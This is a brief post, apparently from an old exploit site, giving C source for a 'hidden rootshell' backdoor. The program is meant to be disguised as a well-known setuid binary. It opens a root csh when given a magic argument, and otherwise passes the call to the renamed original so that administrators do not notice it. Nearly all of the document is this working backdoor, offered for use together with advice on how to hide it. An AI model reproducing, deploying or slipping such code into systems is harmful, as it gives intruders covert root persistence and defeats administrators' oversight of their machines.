This is one of the rootshell program. This program will be rootshell if you specify the special argment. If the special argment is not specified, this program calls a specified program. So, you name this program as well known suid program, it's very difficult for admins to find.
ba06871c2d769a971556d49a3506b1b662ad02c2bd398bf1eee677942ec8d211
/*=======================================================
Hidden Rootshell - HRS1.0 Programmed by UNYUN
http://shadowpenguin.backsection.net
=======================================================
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#define MAGIC "hoge"
#define ORIGINAL "/.desktop-user"
main(argc,argv)
int argc;
char *argv[];
{
int i;
char buffer[2000];
setuid(0); setgid(0);
if (argc==2 && strcmp(argv[1],MAGIC)==0){
system("/usr/bin/csh");
}else{
sprintf(buffer,"chmod 4755 %s",ORIGINAL); system(buffer);
strcpy(buffer,ORIGINAL);
for (i=0;i<argc-1;i++){
strcat(buffer," ");
strcat(buffer,argv[i+1]);
}
system(buffer);
}
sprintf(buffer,"chmod 644 %s",ORIGINAL); system(buffer);
}